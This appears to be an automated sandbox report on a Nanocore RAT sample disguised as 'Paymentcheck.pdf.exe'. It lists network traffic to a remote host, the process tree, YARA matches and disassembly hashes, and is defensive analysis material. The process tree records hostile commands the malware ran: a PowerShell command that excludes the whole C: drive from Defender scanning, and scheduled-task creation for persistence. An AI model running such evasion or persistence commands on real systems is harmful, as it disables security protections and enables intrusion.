                              Aug 3, 2021 08:28:41.061896086 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:41.643378019 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:41.644279957 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:42.124553919 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:42.164846897 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:42.719279051 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:42.856383085 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:42.904690027 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:45.097951889 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:45.198671103 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:45.829430103 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:45.847306967 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:45.847443104 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:46.728147984 CEST201849771217.138.212.57192.168.2.4

                              Code Manipulations

                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              Analysis Process: Paymentcheck.pdf.exe PID: 3736 Parent PID: 6000

                              General

                              Start time:08:26:26
                              Start date:03/08/2021
                              Path:C:\Users\user\Desktop\Paymentcheck.pdf.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Users\user\Desktop\Paymentcheck.pdf.exe'
                              Imagebase:0x660000
                              File size:486400 bytes
                              MD5 hash:B7E3C3C9735D6BA37616D791171FE2DB
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.822099971.0000000002AF6000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.822099971.0000000002AF6000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.824901195.0000000003A21000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.824901195.0000000003A21000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.824901195.0000000003A21000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.825194735.0000000003AA1000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.825194735.0000000003AA1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.825194735.0000000003AA1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                              Reputation:low

                              Chronological Activities

                              Analysis Process: wscript.exe PID: 6464 Parent PID: 3736

                              General

                              Start time:08:27:41
                              Start date:03/08/2021
                              Path:C:\Windows\SysWOW64\wscript.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs'
                              Imagebase:0xc40000
                              File size:147456 bytes
                              MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Chronological Activities

                              Analysis Process: RegAsm.exe PID: 6732 Parent PID: 3736

                              General

                              Start time:08:27:41
                              Start date:03/08/2021
                              Path:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              Imagebase:0x4a0000
                              File size:64616 bytes
                              MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.939558053.0000000006030000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.939558053.0000000006030000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.941661352.0000000006930000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.941661352.0000000006930000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.941806124.0000000006940000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.941806124.0000000006940000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.941998389.0000000006970000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.941998389.0000000006970000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.942163322.00000000069A0000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.942163322.00000000069A0000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.941330753.00000000068E0000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.941330753.00000000068E0000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.942180056.00000000069B0000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.942180056.00000000069B0000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.933970922.0000000003AAE000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.941937307.0000000006960000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.941937307.0000000006960000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.942285370.00000000069F0000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.942285370.00000000069F0000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.941565178.0000000006920000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.941565178.0000000006920000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.938347620.0000000004FF0000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.938347620.0000000004FF0000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.938540171.0000000005210000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.938540171.0000000005210000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.938540171.0000000005210000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.930842679.00000000027C1000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.926760586.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.926760586.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.926760586.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.942057341.0000000006980000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.942057341.0000000006980000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.933309762.0000000003811000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.941830183.0000000006950000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.941830183.0000000006950000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.933547631.0000000003891000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.933547631.0000000003891000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                              Antivirus matches:
                              • Detection: 0%, Virustotal, Browse
                              • Detection: 0%, Metadefender, Browse
                              • Detection: 0%, ReversingLabs
                              Reputation:high

                              Chronological Activities

                              Analysis Process: powershell.exe PID: 6860 Parent PID: 6464

                              General

                              Start time:08:27:42
                              Start date:03/08/2021
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe'
                              Imagebase:0x880000
                              File size:430592 bytes
                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Reputation:high

                              Chronological Activities

                              Analysis Process: conhost.exe PID: 6872 Parent PID: 6860

                              General

                              Start time:08:27:43
                              Start date:03/08/2021
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Chronological Activities

                              Analysis Process: schtasks.exe PID: 1748 Parent PID: 6732

                              General

                              Start time:08:27:46
                              Start date:03/08/2021
                              Path:C:\Windows\SysWOW64\schtasks.exe
                              Wow64 process (32bit):true
                              Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp715E.tmp'
                              Imagebase:0xdd0000
                              File size:185856 bytes
                              MD5 hash:15FF7D8324231381BAD48A052F85DF04
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Chronological Activities

                              Analysis Process: conhost.exe PID: 5968 Parent PID: 1748

                              General

                              Start time:08:27:47
                              Start date:03/08/2021
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Chronological Activities

                              Analysis Process: RegAsm.exe PID: 1476 Parent PID: 968

                              General

                              Start time:08:27:49
                              Start date:03/08/2021
                              Path:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\AppData\Local\Temp\RegAsm.exe 0
                              Imagebase:0x990000
                              File size:64616 bytes
                              MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Reputation:high

                              Chronological Activities

                              Analysis Process: schtasks.exe PID: 6352 Parent PID: 6732

                              General

                              Start time:08:27:49
                              Start date:03/08/2021
                              Path:C:\Windows\SysWOW64\schtasks.exe
                              Wow64 process (32bit):true
                              Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp7DD3.tmp'
                              Imagebase:0xdd0000
                              File size:185856 bytes
                              MD5 hash:15FF7D8324231381BAD48A052F85DF04
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Chronological Activities

                              Analysis Process: conhost.exe PID: 1088 Parent PID: 1476

                              General

                              Start time:08:27:49
                              Start date:03/08/2021
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Chronological Activities

                              Analysis Process: conhost.exe PID: 2340 Parent PID: 6352

                              General

                              Start time:08:27:49
                              Start date:03/08/2021
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Chronological Activities

                              Analysis Process: dhcpmon.exe PID: 5556 Parent PID: 968

                              General

                              Start time:08:27:51
                              Start date:03/08/2021
                              Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
                              Imagebase:0xe60000
                              File size:64616 bytes
                              MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Antivirus matches:
                              • Detection: 0%, Virustotal, Browse
                              • Detection: 0%, Metadefender, Browse
                              • Detection: 0%, ReversingLabs

                              Chronological Activities

                              Analysis Process: conhost.exe PID: 5584 Parent PID: 5556

                              General

                              Start time:08:27:52
                              Start date:03/08/2021
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Chronological Activities

                              Analysis Process: dhcpmon.exe PID: 6448 Parent PID: 3424

                              General

                              Start time:08:27:59
                              Start date:03/08/2021
                              Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
                              Imagebase:0xdf0000
                              File size:64616 bytes
                              MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET

                              Chronological Activities

                              Analysis Process: conhost.exe PID: 7008 Parent PID: 6448

                              General

                              Start time:08:28:00
                              Start date:03/08/2021
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Chronological Activities

                              Disassembly

                              Code Analysis

                              Reset < >

                                Analysis Process: Paymentcheck.pdf.exe PID: 3736 Parent PID: 6000 Paymentcheck.pdf.exeCOMMON

                                Executed Functions

                                Function 0793C3D8, Relevance: .4, Instructions: 400COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.850327224.0000000007930000.00000040.00000001.sdmp, Offset: 07930000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 993de69dc0928159eaeb0ea9c923bf4687613b1c6e9d10c015ab1c609b9f07cb
                                • Instruction ID: a2bbe84f199a3e6988d4dedfd15d26c0d0c8ab86763c676ba694931b4c453a10
                                • Opcode Fuzzy Hash: 993de69dc0928159eaeb0ea9c923bf4687613b1c6e9d10c015ab1c609b9f07cb
                                • Instruction Fuzzy Hash: CFE1CCB1700A458FEB29DB76C450BAFB7FAAF89304F144469E146EB391CB35E901CB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04F41AB0, Relevance: .2, Instructions: 249COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.836746480.0000000004F40000.00000040.00000001.sdmp, Offset: 04F40000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 045ec64ab54e4ded4ea0783a8d59a719169ee49c2d7a32b06f0c72c1570dcea3
                                • Instruction ID: a3d7228d7d44365485d1f92d97970c536d7d23f317d1f34dd79b268ab8552134
                                • Opcode Fuzzy Hash: 045ec64ab54e4ded4ea0783a8d59a719169ee49c2d7a32b06f0c72c1570dcea3
                                • Instruction Fuzzy Hash: 3FA1A375E00319CFCB04DBA0D894ADDBBB6FF89314F158615E415AB364EF30A986DB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0793A150, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0793A386
                                Memory Dump Source
                                • Source File: 00000000.00000002.850327224.0000000007930000.00000040.00000001.sdmp, Offset: 07930000, based on PE: false
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 0acaf3b4a830bef107310f0c563da83c4529f203d9b72d5fbc9481343ac4ea88
                                • Instruction ID: de1747fbab63415de6628e94591d631512fa54ecc6789b100c1c9b9b04ef891f
                                • Opcode Fuzzy Hash: 0acaf3b4a830bef107310f0c563da83c4529f203d9b72d5fbc9481343ac4ea88
                                • Instruction Fuzzy Hash: C7915BB1D0021ACFDB10CFA4C885BEDBBB6FB48318F058569E858B7240DB759985CF91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04F46FD8, Relevance: 1.7, APIs: 1, Instructions: 168COMMON
                                Download Yara Rule
                                APIs
                                • KiUserCallbackDispatcher.NTDLL(00000014,?,?,03A240DC,02A40110,?,00000000), ref: 04F47136
                                Memory Dump Source
                                • Source File: 00000000.00000002.836746480.0000000004F40000.00000040.00000001.sdmp, Offset: 04F40000, based on PE: false
                                Similarity
                                • API ID: CallbackDispatcherUser
                                • String ID:
                                • API String ID: 2492992576-0
                                • Opcode ID: 87e37a93b46b319e2292cf2b8849a315bef927f8b6ae6eddd8f27c4c2080a41a
                                • Instruction ID: 900abe411e65ed1e05ac39455072be566b8e65f6a3715e0961fa072a4b23bc00
                                • Opcode Fuzzy Hash: 87e37a93b46b319e2292cf2b8849a315bef927f8b6ae6eddd8f27c4c2080a41a
                                • Instruction Fuzzy Hash: 57715F74A01248EFDB15DFA9D894D9EBBB6BF88714F114498F901AB361DB31EC82CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04F417AC, Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                Download Yara Rule
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F418CA
                                Memory Dump Source
                                • Source File: 00000000.00000002.836746480.0000000004F40000.00000040.00000001.sdmp, Offset: 04F40000, based on PE: false
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: 9545d90c08b76c1eb480da85a1de1d00ce520cc5b382c7c160625d7a1b4b9e61
                                • Instruction ID: c73dee5aaa45a61abb413dd022a76c4add82b4ae272b8e2d16cb582b042b7e56
                                • Opcode Fuzzy Hash: 9545d90c08b76c1eb480da85a1de1d00ce520cc5b382c7c160625d7a1b4b9e61
                                • Instruction Fuzzy Hash: B351C2B1D002099FDF15CF99C984ADEBFB5FF88314F14812AE418AB210D775A986CF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0793AA90, Relevance: 1.6, APIs: 1, Instructions: 125COMMON
                                Download Yara Rule
                                APIs
                                • GetWindowTextW.USER32(?,00000000,?), ref: 0793ABBC
                                Memory Dump Source
                                • Source File: 00000000.00000002.850327224.0000000007930000.00000040.00000001.sdmp, Offset: 07930000, based on PE: false
                                Similarity
                                • API ID: TextWindow
                                • String ID:
                                • API String ID: 530164218-0
                                • Opcode ID: 11208e74d38cfbe970124e6c1d38e37e00e6e2c749ca7ff6384c76fcc1c6fde7
                                • Instruction ID: ae5833e9488f7b6f5f79a884ed0046df2ab8eb6a595c992ad4735c260cb8cd5f
                                • Opcode Fuzzy Hash: 11208e74d38cfbe970124e6c1d38e37e00e6e2c749ca7ff6384c76fcc1c6fde7
                                • Instruction Fuzzy Hash: DA5102B0D002198FDB14CFA9C894B9EBBB5EF48318F15C12AE859BB350C774A845CF95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04F417B8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                Download Yara Rule
                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F418CA
                                Memory Dump Source
                                • Source File: 00000000.00000002.836746480.0000000004F40000.00000040.00000001.sdmp, Offset: 04F40000, based on PE: false
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: bd5706c2f75ceea1454be08edab99e9e1d0a1fab6541bd7052efd99df6d4e9f2
                                • Instruction ID: 26bde4879ebcdb2847b610de70053d8ef02cd0464bef0f30040b576e5636dd22
                                • Opcode Fuzzy Hash: bd5706c2f75ceea1454be08edab99e9e1d0a1fab6541bd7052efd99df6d4e9f2
                                • Instruction Fuzzy Hash: 5641A3B1D003199FDF14CF99C984ADEBFB5BF88314F24812AE419AB210D774A986CF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0793AE48, Relevance: 1.6, APIs: 1, Instructions: 112COMMON
                                Download Yara Rule
                                APIs
                                • K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 0793AF49
                                Memory Dump Source
                                • Source File: 00000000.00000002.850327224.0000000007930000.00000040.00000001.sdmp, Offset: 07930000, based on PE: false
                                Similarity
                                • API ID: BaseModuleName
                                • String ID:
                                • API String ID: 595626670-0
                                • Opcode ID: ce62b14cca8df469f94189d5706e79f238fc3f6d1ead83cff1ced1f599271c04
                                • Instruction ID: d04602e5449e4a272620a95de1a0087eeb3e35ac335752604e756480991e408f
                                • Opcode Fuzzy Hash: ce62b14cca8df469f94189d5706e79f238fc3f6d1ead83cff1ced1f599271c04
                                • Instruction Fuzzy Hash: 5F4134B0D042598FCB14CFA9C895B9EBBF5FF48318F14C12AE859AB340D7749845CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04F43D40, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                Download Yara Rule
                                APIs
                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 04F43E01
                                Memory Dump Source
                                • Source File: 00000000.00000002.836746480.0000000004F40000.00000040.00000001.sdmp, Offset: 04F40000, based on PE: false
                                Similarity
                                • API ID: CallProcWindow
                                • String ID:
                                • API String ID: 2714655100-0
                                • Opcode ID: 70c7696bf5975245235fc58c5091a76f118a7f3424c97397211c253cfab86128
                                • Instruction ID: ffc378857c12f44db74c3a154d982917954c60960411edfd3821b7fe4d01170b
                                • Opcode Fuzzy Hash: 70c7696bf5975245235fc58c5091a76f118a7f3424c97397211c253cfab86128
                                • Instruction Fuzzy Hash: F3413AB4A00309CFCB14CF99C488A9ABBF5FF88314F14C559D919AB321D774A946CFA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 07937398, Relevance: 1.6, APIs: 1, Instructions: 71fileCOMMON
                                Download Yara Rule
                                APIs
                                • CopyFileW.KERNELBASE(?,00000000,?), ref: 07937439
                                Memory Dump Source
                                • Source File: 00000000.00000002.850327224.0000000007930000.00000040.00000001.sdmp, Offset: 07930000, based on PE: false
                                Similarity
                                • API ID: CopyFile
                                • String ID:
                                • API String ID: 1304948518-0
                                • Opcode ID: 66391f2dc9726f02265ac592f2a06f3edae82ac33d3a633ce7bc9e88a2f9f1e4
                                • Instruction ID: be586ae0c56701a4aa98c878ddbefb65069a3ba8db447cb1925772e76c5be8e2
                                • Opcode Fuzzy Hash: 66391f2dc9726f02265ac592f2a06f3edae82ac33d3a633ce7bc9e88a2f9f1e4
                                • Instruction Fuzzy Hash: 8B2148B1D012199FDB00CF99D5847EEFBF5EF48210F18816AE818F7241D7789A41CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 079373A0, Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON
                                Download Yara Rule
                                APIs
                                • CopyFileW.KERNELBASE(?,00000000,?), ref: 07937439
                                Memory Dump Source
                                • Source File: 00000000.00000002.850327224.0000000007930000.00000040.00000001.sdmp, Offset: 07930000, based on PE: false
                                Similarity
                                • API ID: CopyFile
                                • String ID:
                                • API String ID: 1304948518-0
                                • Opcode ID: 0424842de0488476a84a0423995439e93de0cab233e386439ec8a13522a054e1
                                • Instruction ID: b93579c7990b07c3e9c3003dc5f8d6c8f4ddae2ccd12fd82a426dc97e1b6fb0b
                                • Opcode Fuzzy Hash: 0424842de0488476a84a0423995439e93de0cab233e386439ec8a13522a054e1
                                • Instruction Fuzzy Hash: 60212CB1D012199FDB50CF9AD4847EEFBF5EF48310F14816AD818A7241D7749A45CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 07939F48, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                Download Yara Rule
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07939FD8
                                Memory Dump Source
                                • Source File: 00000000.00000002.850327224.0000000007930000.00000040.00000001.sdmp, Offset: 07930000, based on PE: false
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: adcbae28d5fa6d1fa8ce7fbeeb97986f97d7327497f137b66de89af11031c3e7
                                • Instruction ID: 0597be27f723d513c9f504c3215a8de7d65dcb82b3afc254f89b3c4cbd57ed47
                                • Opcode Fuzzy Hash: adcbae28d5fa6d1fa8ce7fbeeb97986f97d7327497f137b66de89af11031c3e7
                                • Instruction Fuzzy Hash: 12213BB19003599FCF00DFA9C885BDEBBF5FF48314F008429E918A7240C7B8A945CBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0793A7E0, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                Download Yara Rule
                                APIs
                                • K32EnumProcesses.KERNEL32(00000000,?,?), ref: 0793A86B
                                Memory Dump Source
                                • Source File: 00000000.00000002.850327224.0000000007930000.00000040.00000001.sdmp, Offset: 07930000, based on PE: false
                                Similarity
                                • API ID: EnumProcesses
                                • String ID:
                                • API String ID: 84517404-0
                                • Opcode ID: 9b8bb7dce474029bf8bd073a66ace8624b102a87aff6d5affb15d0f17da6fafb
                                • Instruction ID: 2cd8669a7d97237296fbd42faf00eda266458018af57cd92b1bab88e64084cc1
                                • Opcode Fuzzy Hash: 9b8bb7dce474029bf8bd073a66ace8624b102a87aff6d5affb15d0f17da6fafb
